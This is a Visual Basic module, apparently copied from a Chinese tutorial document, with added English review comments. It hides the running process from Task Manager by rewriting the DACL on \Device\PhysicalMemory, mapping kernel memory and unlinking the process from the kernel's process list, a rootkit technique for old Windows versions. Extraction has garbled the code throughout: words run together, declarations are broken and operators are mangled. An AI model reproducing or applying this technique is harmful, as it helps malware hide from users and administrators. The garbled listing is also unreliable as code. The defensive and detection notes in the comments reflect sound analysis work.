vb中如何在任务管理器里面隐藏应用程序进程.docx


vb中如何在任务管理器里面隐藏应用程序进程

vb中如何在任务管理器里面隐藏应用程序进程

' This module hides a process from Task Manager (translated from the original comment).
' NOTE(review): whitespace and some lines were lost when this listing was extracted
' (for example "PrivateConst" where the keywords should be separated), so it does
' not compile as shown.

' NTSTATUS codes. Only STATUS_ACCESS_DENIED is referenced in the visible code,
' where OpenPhysicalMemory compares it with the result of ZwOpenSection.
PrivateConstSTATUS_INFO_LENGTH_MISMATCH=&HC0000004

PrivateConstSTATUS_ACCESS_DENIED=&HC0000022

PrivateConstSTATUS_INVALID_HANDLE=&HC0000008

' Not referenced in the visible code.
PrivateConstERROR_SUCCESS=0&

' Access rights requested on the \Device\PhysicalMemory section object.
PrivateConstSECTION_MAP_WRITE=&H2

PrivateConstSECTION_MAP_READ=&H4

' Rights used to reopen the section so that its DACL can be read and rewritten
' after the first open is denied (see OpenPhysicalMemory).
PrivateConstREAD_CONTROL=&H20000

PrivateConstWRITE_DAC=&H40000

' Inheritance flag and security-information selector passed to the advapi32
' ACL calls in SetPhyscialMemorySectionCanBeWrited.
PrivateConstNO_INHERITANCE=0

PrivateConstDACL_SECURITY_INFORMATION=&H4

' Native-API status block. Not referenced by any routine in the visible listing.
PrivateTypeIO_STATUS_BLOCK

StatusAsLong

InformationAsLong

EndType

' Counted string used by the native API. OpenPhysicalMemory fills one through
' RtlInitUnicodeString and stores its address in OBJECT_ATTRIBUTES.ObjectName.
PrivateTypeUNICODE_STRING

LengthAsInteger

MaximumLengthAsInteger

' Pointer to the character data, held as a 32-bit Long.
BufferAsLong

EndType

' Object-attribute flag constants.
' NOTE(review): extraction separated several names from their values and
' reordered the lines, so the name/value pairing below cannot be trusted.
' None of these constants is referenced in the visible code:
' OpenPhysicalMemory sets Attributes.Attributes to 0.
PrivateConstOBJINHERIT=&H2

&H10

PrivateConstOBJ_PERMANENT

PrivateConstOBJ_EXCLUSIVE=&H20

=&H40

&H200

=&H3F2

PrivateConstOBJ_CASE_INSENSITIVE

PrivateConstOBJ_OPENIF=&H80

PrivateConstOBJ_OPENLINK=&H100

PrivateConstOBJ_KERNEL_HANDLE=

PrivateConstOBJ_VALID_ATTRIBUTES

' Structure passed to ZwOpenSection to name the object being opened.
' OpenPhysicalMemory sets Length and ObjectName and zeroes every other field.
PrivateTypeOBJECT_ATTRIBUTES

LengthAsLong

RootDirectoryAsLong

' Address of a UNICODE_STRING (set with VarPtr in OpenPhysicalMemory).
ObjectNameAsLong

AttributesAsLong

' NOTE(review): the field name looks truncated by extraction; the same spelling
' is used where OpenPhysicalMemory assigns it.
SecurityDeorAsLong

SecurityQualityOfServiceAsLong

EndType

' ACL header layout. Not referenced by any routine in the visible listing;
' the ACL pointers there are handled as plain Long values.
PrivateTypeACL

AclRevisionAsByte

Sbz1AsByte

AclSizeAsInteger

AceCountAsInteger

Sbz2AsInteger

EndType

' Enumerations and structures for the advapi32 explicit-access ACL calls.
' The visible code uses only GRANT_ACCESS, TRUSTEE_IS_NAME, TRUSTEE_IS_USER and
' SE_KERNEL_OBJECT, all in SetPhyscialMemorySectionCanBeWrited.

' How an EXPLICIT_ACCESS entry is merged into an ACL.
PrivateEnumACCESS_MODE

NOT_USED_ACCESS

GRANT_ACCESS

SET_ACCESS

DENY_ACCESS

REVOKE_ACCESS

SET_AUDIT_SUCCESS

SET_AUDIT_FAILURE

EndEnum

PrivateEnumMULTIPLE_TRUSTEE_OPERATION

NO_MULTIPLE_TRUSTEE

TRUSTEE_IS_IMPERSONATE

EndEnum

' Whether the trustee is identified by SID or by name.
PrivateEnumTRUSTEE_FORM

TRUSTEE_IS_SID

TRUSTEE_IS_NAME

EndEnum

PrivateEnumTRUSTEE_TYPE

TRUSTEE_IS_UNKNOWN

TRUSTEE_IS_USER

TRUSTEE_IS_GROUP

EndEnum

' Identifies the account that an access entry applies to.
PrivateTypeTRUSTEE

pMultipleTrusteeAsLong

MultipleTrusteeOperationAsMULTIPLE_TRUSTEE_OPERATION

TrusteeFormAsTRUSTEE_FORM

TrusteeTypeAsTRUSTEE_TYPE

ptstrNameAsString

EndType

' One access entry: permissions, merge mode, inheritance and trustee.
' NOTE(review): extraction collapsed the type header and its first three fields
' onto a single line.
PrivateTypeEXPLICIT_ACCESSgrfAccessPermissionsAsLonggrfAccessModeAsACCESS_MODEgrfInheritanceAsLong

TRUSTEEAsTRUSTEE

EndType

' Not referenced by any routine in the visible listing.
PrivateTypeAceArray

List()AsEXPLICIT_ACCESS

EndType

' Kind of securable object passed to GetSecurityInfo / SetSecurityInfo.
' NOTE(review): the first two members were collapsed onto one line by extraction.
PrivateEnumSE_OBJECT_TYPE

SE_UNKNOWN_OBJECT_TYPE=0SE_FILE_OBJECT

SE_SERVICE

SE_PRINTER

SE_REGISTRY_KEY

SE_LMSHARE

SE_KERNEL_OBJECT

SE_WINDOW_OBJECT

SE_DS_OBJECT

SE_DS_OBJECT_ALL

SE_PROVIDER_DEFINED_OBJECT

SE_WMIGUID_OBJECT

EndEnum

' External API declarations (advapi32 for ACL handling, kernel32 for mapping and copying).
' NOTE(review): this part of the listing is badly damaged by extraction. Parameter
' lists are interleaved and several declarations are missing or reduced to fragments.
' The routines below call GetSecurityInfo, SetEntriesInAcl, RtlInitUnicodeString,
' ZwOpenSection, CloseHandle and LocalFree, none of which has a complete Declare
' in the visible text; some of the stray fragments below presumably belong to them.
PrivateDeclareFunctionSetSecuritylnfoLib

"advapi32.dll"(ByValHandleAsLong,ByVal

ObjectTypeAsSE_OBJECT_TYPE

ByValSecurityInfoAsLong

ppsidOwner

 

AsLong,ppsidGroupAsLong,ppDaclAsAny,ppSaclAsAny)AsLong

ObjectTypeAsSE_OBJECT_TYPE,ByValSecurityInfoAsLong,ppsidOwner

Long

pListOfExplicitEntriesAs

cCountOfExplicitEntriesAsLong

EXPLICIT_ACCESS,ByValOldAclAsLong,NewAclAsLong)AsLong

' Declared but not called in the visible code; the EXPLICIT_ACCESS entry is
' filled in field by field instead.
PrivateDeclareSubBuildExplicitAccessWithNameLib"advapi32.dll"Alias

"BuildExplicitAccessWithNameA"(pExplicitAccessAsEXPLICIT_ACCESS,ByVal

ByValAccessModeAs

pTrusteeNameAsString,ByValAccessPermissionsAsLong

ACCESS_MODE,ByValInheritanceAsLong)

UNICODE_STRING,ByValSourceStringAsLong)

' Maps a window of the section into this process; used on the physical-memory
' section handle with 4 KB (&H1000) windows.
PrivateDeclareFunctionMapViewOfFileLib"kernel32"(ByValhFileMappingObjectAsLong

dwFileOffsetLowAsLong,ByValdwNumberOfBytesToMapAsLong)AsLong

PrivateDeclareFunctionUnmapViewOfFileLib"kernel32"(lpBaseAddressAsAny)AsLong

' Raw memory copy (alias of RtlMoveMemory); used to read and write 4-byte
' values through mapped views.
PrivateDeclareSubCopyMemoryLib"kernel32"Alias"RtlMoveMemory"(DestinationAsAny

SourceAsAny,ByValLengthAsLong)

' ANSI version query; its result selects the hard-coded offsets.
PrivateDeclareFunctionGetVersionExLib"kernel32"Alias"GetVersionExA"

(IpVersionlnformationAsOSVERSIONINFO)AsLong

' Version structure filled by GetVersionEx. The code reads dwPlatformId,
' dwMajorVersion and dwMinorVersion to choose hard-coded offsets.
PrivateTypeOSVERSIONINFO

dwOSVersionInfoSizeAsLong

dwMajorVersionAsLong

dwMinorVersionAsLong

dwBuildNumberAsLong

dwPlatformIdAsLong

szCSDVersionAsString*128

EndType

' Module-level state shared by the routines below.
PrivateverinfoAsOSVERSIONINFO

' Not referenced in the visible code.
Privateg_hNtDLLAsLong

' Address of the 4 KB view mapped in OpenPhysicalMemory; passed to LinearToPhys
' as the base of the table used for address translation.
Privateg_pMapPhysicalMemoryAsLong

' Handle to the \Device\PhysicalMemory section.
Privateg_hMPMAsLong

' 4-byte scratch buffer used by LinearToPhys.
PrivateaByte(3)AsByte

' Hides the calling process from process listings (translated from the original
' comment) by editing kernel data through a user-mode mapping of physical memory.
'
' What the visible code does:
'  1. Chooses structure offsets from the OS version. Only platform id 2 with major
'     version 5 and minor version 0 or 1 (Windows 2000 and Windows XP) is handled.
'  2. Opens and maps \Device\PhysicalMemory (OpenPhysicalMemory).
'  3. Reads a thread pointer, then a process pointer, then the forward and backward
'     links stored in the process structure.
'  4. Rewrites the neighbours' links so that they point at each other, which removes
'     this entry from the doubly linked list without changing anything else.
'
' Review and defensive notes:
'  - There is no guard for unsupported versions. On any other OS the three offsets
'    stay 0, yet the write path still runs whenever the section can be opened, which
'    risks corrupting kernel memory instead of failing cleanly.
'  - lOffsetPID is assigned but never read in the visible code.
'  - The return values of SetData are ignored, so a half-applied update goes unnoticed.
'  - The technique needs user-mode write access to \Device\PhysicalMemory. Windows
'    Server 2003 SP1 and later do not permit user-mode access to that object, so the
'    listing applies only to the older systems it hard-codes.
'  - Only two list pointers change. The process keeps its threads and handles, so
'    comparing process views obtained from independent sources exposes the mismatch.
'  - A user-mode open of \Device\PhysicalMemory with write access is itself a strong
'    indicator worth alerting on for such hosts.
PublicSubHideCurrentProcess()

'在进程列表中隐藏当前应用程序进程

DimthreadAsLong,processAsLong,fwAsLong,bwAsLong

DimlOffsetFlinkAsLong,lOffsetBlinkAsLong,lOffsetPIDAsLong

verinfo.dwOSVersionlnfoSize=Len(verinfo)

If(GetVersionEx(verinfo))<>0Then

Ifverinfo.dwPlatformld=2Then

Ifverinfo.dwMajorVersion=5Then

SelectCaseverinfo.dwMinorVersion

' Version 5.0: offsets of the forward link, backward link and PID field.
Case0

lOffsetFlink=&HA0

lOffsetBlink=&HA4

lOffsetPID=&H9C

' Version 5.1: the same three fields at different offsets.
Case1

lOffsetFlink=&H88

lOffsetBlink=&H8C

lOffsetPID=&H84

EndSelect

EndIf

EndIf

EndIf

IfOpenPhysicalMemory<>0Then

' Fixed kernel virtual address; presumably the current-thread pointer in the
' per-processor control region on 32-bit NT 5.x. TODO confirm.
thread=GetData(&HFFDFF124)

' Presumably the owning-process pointer inside the thread structure. TODO confirm.
process=GetData(thread+&H44)

fw=GetData(process+lOffsetFlink)

bw=GetData(process+lOffsetBlink)

' Next entry's backward link (at fw+4) now points to the previous entry.
SetDatafw+4,bw

' Previous entry's forward link (at bw) now points to the next entry.
SetDatabw,fw

' Only the section handle is closed here; the view stored in
' g_pMapPhysicalMemory is not unmapped in the visible code.
CloseHandleg_hMPM

EndIf

EndSub

' Adds an access-allowed entry granting SECTION_MAP_WRITE to the current user
' on the section object referred to by hSection.
'
' Steps: read the existing DACL (GetSecurityInfo), build one EXPLICIT_ACCESS entry,
' merge it into a new ACL (SetEntriesInAcl), write the new DACL back
' (SetSecurityInfo), then free the returned buffers.
'
' Review and defensive notes:
'  - No return value is checked; a failed call falls through to the next one.
'  - The CleanUp label has no matching GoTo in the visible code.
'  - The caller opens hSection with READ_CONTROL or WRITE_DAC, so this succeeds only
'    for an account that already holds WRITE_DAC on the object; presumably an
'    administrator-level account. TODO confirm.
'  - A DACL change on the physical-memory section object is an unusual event and a
'    useful detection point on systems where the object is reachable.
'  - NOTE(review): several identifiers below are misspelled by extraction.
PrivateSubSetPhyscialMemorySectionCanBeWrited(ByVaihSectionAsLong)

DimpDaciAsLong

DimpNewDaciAsLong

DimpSDAsLong

DimdwResAsLong

DimeaAsEXPLICIT_ACCESS

' Fetch the current DACL and the security descriptor that owns it.
GetSecurityInfohSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pDaci,0,pSD

' Describe the new entry: grant map-write, no inheritance, trustee given by name.
ea.grfAccessPermissions=SECTION_MAP_WRITE

ea.grfAccessMode=GRANT_ACCESS

ea.grfInheritance=NO_INHERITANCE

ea.TRUSTEE.TrusteeForm=TRUSTEE_IS_NAME

ea.TRUSTEE.TrusteeType=TRUSTEE_IS_USER

ea.TRUSTEE.ptstrName="CURRENT_USER"&vbNuilChar

' Merge the single entry with the old DACL into a newly allocated ACL.
SetEntriesInAci1,ea,pDaci,pNewDaci

' Replace the object's DACL with the merged ACL.
SetSecurityInfohSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,

ByVaipNewDaci,0

CieanUp:

' Free the buffers returned by the security APIs.
LocaiFreepSD

LocalFreepNewDacI

EndSub

'转载请注名来自爱软件()阿江编注。

' Opens the \Device\PhysicalMemory section for read/write and maps one 4 KB page
' of it for later address translation.
'
' Returns the section handle (g_hMPM) when both the open and the mapping succeed;
' otherwise the function result keeps its default value of 0.
'
' Review and defensive notes:
'  - If the first open returns STATUS_ACCESS_DENIED, the section is reopened with
'    READ_CONTROL or WRITE_DAC, its DACL is rewritten to grant the current user
'    map-write access, and the read/write open is retried. The status of the
'    intermediate open is not checked before the handle is used.
'  - The mapped offset is a hard-coded constant per OS version (5.0 and 5.1 only).
'    On any other version lDirectoty stays 0 and offset 0 is mapped instead.
'  - When the open succeeds but MapViewOfFile fails, g_hMPM is left open and the
'    caller sees 0, so the handle is leaked.
'  - Windows Server 2003 SP1 and later do not permit user-mode access to
'    \Device\PhysicalMemory, so the open fails there.
PrivateFunctionOpenPhysicalMemory()AsLong

DimStatusAsLong

DimPhysmemStringAsUNICODE_STRING

DimAttributesAsOBJECT_ATTRIBUTES

' Build the counted-string object name and the attribute block that refers to it.
RtlInitUnicodeStringPhysmemString,StrPtr("\Device\PhysicalMemory")

Attributes.Length=Len(Attributes)

Attributes.RootDirectory=0

Attributes.ObjectName=VarPtr(PhysmemString)

Attributes.Attributes=0

Attributes.SecurityDeor=0

Attributes.SecurityQualityOfService=0

' First attempt: ask for read and write mapping rights directly.
Status=ZwOpenSection(g_hMPM,SECTION_MAP_READorSECTION_MAP_WRITE

Attributes)

IfStatus=STATUS_ACCESS_DENIEDThen

' Denied: reopen with rights to read and change the DACL, add the grant,
' close that handle, then retry the read/write open.
Status=ZwOpenSection(g_hMPM,READ_CONTROLorWRITE_DAC,Attributes)

SetPhyscialMemorySectionCanBeWritedg_hMPM

CloseHandleg_hMPM

Status=ZwOpenSection(g_hMPM,SECTION_MAP_READorSECTION_MAP_WRITE

Attributes)

EndIf

DimlDirectotyAsLong

' Pick the section offset to map from the OS version. Presumably the physical
' address of the page directory used by LinearToPhys. TODO confirm.
If(GetVersionEx(verinfo

))<>0Then

Ifverinfo.dwPlatformld=2Then

Ifverinfo.dwMajorVersion

=5Then

SelectCaseverinfo.dwMinorVersion

Case0

lDirectoty=&H30000

Case1

lDirectoty=&H39000

EndSelect

EndIf

EndIf

EndIf

IfStatus=0Then

' Map one page (&H1000 bytes) at that offset. Access value 4 equals this
' file's SECTION_MAP_READ.
g_pMapPhysicalMemory

=MapViewOfFile(g_hMPM,4,0,lDirectoty,&H1000)

Ifg_pMapPhysicalMemory

<>0ThenOpenPhysicalMemory=g_hMPM

EndIf

EndFunction

' Translates a virtual address to a physical address by walking page tables in software.
'
' BaseAddress: address of the mapped top-level table (g_pMapPhysicalMemory).
' addr:        virtual address to translate.
' Returns the physical address, or 0 when an entry on the path is not marked present.
'
' The bit layout used (index = address / 2^22, 4-byte entries, bit 0 = present,
' bit &H80 = large page, 12-bit page offset) matches 32-bit x86 two-level paging.
' A system using a different paging mode would presumably be mistranslated. TODO confirm.
'
' Review notes:
'  - The page-table view is unmapped only inside the "entry present" branch, so a
'    non-present entry leaks the view.
'  - The result of MapViewOfFile is not checked before it is dereferenced.
'  - A return of 0 is not distinguished by callers from a valid physical address 0.
'  - NOTE(review): the exponent operators and one hex mask below were garbled by extraction.
PrivateFunctionLinearToPhys(BaseAddressAsLong,addrAsLong)AsLong

DimVAddrAsLong,PGDEAsLong,PTEAsLong,PAddrAsLong

DimlTempAsLong

VAddr=addr

' Copy the address into the byte buffer so that it can be treated as unsigned,
' then take the top bits as the directory index. Two statements were collapsed
' onto one line by extraction.
CopyMemoryaByte(0),VAddr,4lTemp=Fix(ByteArrToLong(aByte)/(2A22))

' Address of the directory entry, then load the 4-byte entry itself.
PGDE=BaseAddress+ITemp*4

CopyMemoryPGDE,

ByValPGDE,4

' Bit 0 set: the directory entry is present.
If(PGDEAnd1)<>

0Then

' Bit &H80 set: the entry maps a large page directly.
lTemp=PGDEAnd

&H80

IflTemp<>0Then

' Large page: frame from the high bits, offset from the low 22 bits.
PAddr=(PGDEAnd

&HFFC00000)+(VAddrAnd

&H3FFFFF)

Else

' Otherwise map the page table that the entry points to.
PGDE=MapViewOfFile(g_hMPM,4,0,PGDEAnd

&HFFFFF000,&H1000)

' Middle bits of the address select the page-table entry.
lTemp=(VAddrAnd

&H3FF000)/(2人12)

PTE=PGDE+lTemp

*4

CopyMemoryPTE,ByValPTE,4

If(PTEAnd1)<>0Then

' Present: frame from the entry, offset from the low 12 bits.
PAddr=(PTEAnd&HFFFFFOOO)+(VAddrAnd&HFFF)

UnmapViewOfFilePGDE

EndIf

EndIf

EndIf

LinearToPhys=PAddr

EndFunction

' Reads one 4-byte value from the given virtual address through the
' physical-memory section.
'
' addr: virtual address to read.
' Returns the value read, or 0 (the default result) when the page cannot be mapped.
'
' Review notes:
'  - A failed mapping and a stored value of 0 both return 0.
'  - A failed translation (LinearToPhys returning 0) is not detected; the code then
'    maps the page at physical offset 0.
PrivateFunctionGetData(addrAsLong)AsLong

DimphysAsLong,tmpAsLong,retAsLong

' Translate, then map the 4 KB page that contains the physical address.
' Access value 4 equals this file's SECTION_MAP_READ. Two statements were
' collapsed onto one line by extraction.
phys=LinearToPhys(g_pMapPhysicalMemory,addr)tmp=MapViewOfFile(g_hMPM,4,0,physAnd&HFFFFF000,&H1000)

Iftmp<>0Then

' Offset inside the page, rounded down to a 4-byte boundary (the exponent
' operator was garbled by extraction).
ret=tmp+((physAnd&HFFF)/(2A2))*4

' Replace the pointer held in ret with the 4 bytes it points to.
CopyMemoryret,ByVairet,4

UnmapViewOfFiletmp

GetData=ret

EndIf

EndFunction

' Writes one 4-byte value to the given virtual address through the
' physical-memory section.
'
' addr: virtual address to write.
' data: value to store.
' Returns True when the page was mapped and the value copied; otherwise False
' (the default result).
'
' Review notes:
'  - A failed translation (LinearToPhys returning 0) is not detected, so the write
'    would land in the page at physical offset 0.
'  - HideCurrentProcess ignores this function's result.
'  - NOTE(review): extraction moved the tail of the MapViewOfFile call ("&H1000)")
'    above the line it belongs to.
PrivateFunctionSetData(ByVaiaddrAsLong,ByVaidataAsLong)AsBoolean

DimphysAsLong,tmpAsLong,xAsLong

phys=LinearToPhys(g_pMapPhysicalMemory,addr)

&H1000)

' Map the containing 4 KB page with write access.
tmp=MapViewOfFile(g_hMPM,SECTION_MAP_WRITE,0,physAnd&HFFFFF000

Iftmp<>0Then

' Offset inside the page, rounded down to a 4-byte boundary (the exponent
' operator was garbled by extraction).
x=tmp+((physAnd&HFFF)/(2a2))*4

' Store the 4 bytes of data at that location.
CopyMemoryByValx,data,4

UnmapViewOfFiletmp

SetData=True

EndIf

EndFunction

'转载请注名来自爱软件()阿江编注。

' Combines the first four bytes of inByte into one number, least significant
' byte first.
'
' inByte: byte array with at least indexes 0 to 3.
' Returns the value as a Double, so results above the positive range of a signed
' 32-bit Long are still representable; LinearToPhys relies on this to treat an
' address as unsigned.
PrivateFunctionByteArrToLong(inByte()AsByte)AsDouble

DimiAsInteger

Fori=0To3

' Byte i is weighted by &H100 raised to the power i (the exponent operator was
' garbled by extraction).
ByteArrToLong=ByteArrToLong+inByte(i)*(&H100ai)

Nexti

EndFunction
